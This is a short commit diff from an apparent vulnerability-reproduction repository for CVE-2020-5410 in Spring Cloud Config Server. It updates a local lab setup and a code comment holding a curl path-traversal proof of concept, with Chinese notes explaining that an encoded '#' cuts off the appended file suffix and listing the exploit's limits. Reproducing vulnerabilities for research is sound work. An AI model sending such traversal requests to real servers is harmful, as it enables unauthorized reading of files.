fix: CVE-2020-5410

Author: “threedr3am”

spring/spring-cloud-config-server-CVE-2020-5410/src/main/java/com/threedr3am/bug/spring/config/server/package-info.java

@@ -4,8 +4,14 @@
  *
  * org.springframework.cloud.config.server.environment.EnvironmentController#getEnvironment(java.lang.String, java.lang.String, java.lang.String, boolean)
  *
- * echo "threedr3am" > /Users/person/tmp/fakenew.txt
- * curl http://127.0.0.1:9988/fakenew.txt%23/bbbbb/..%28_%29..%28_%29..%28_%29..%28_%29..%28_%29..%28_%29..%28_%29Users%28_%29person%28_%29tmp%28_%29
+ * echo "threedr3am" > /tmp/fake-news.txt
+ * curl http://127.0.0.1:9988/fake-news.txt%23/bbbbb/..%28_%29..%28_%29..
+ *
+ * 利用核心：使用#去注释掉springboot自动拼接的配置文件后缀
+ *
+ * todo 限制：
+ * 1. 只能穿越到上层目录，比如native目录在 /tmp/aaa/bbb，则只能穿到 /tmp/aaa 或 /tmp 或 /
+ * 2. 文件必须存在后缀
  *
  * @author threedr3am
  */

spring/spring-cloud-config-server-CVE-2020-5410/src/main/resources/application.yml

@@ -5,6 +5,6 @@ spring:
     config:
       server:
         native:
-          search-locations: file:///tmp/{label},file:///tmp/{application},file:///tmp/{profiles}
+          search-locations: file:///tmp/aaa/bbb{label},file:///tmp/aaa/bbb{application},file:///tmp/aaa/bbb{profiles}
 server:
   port: 9988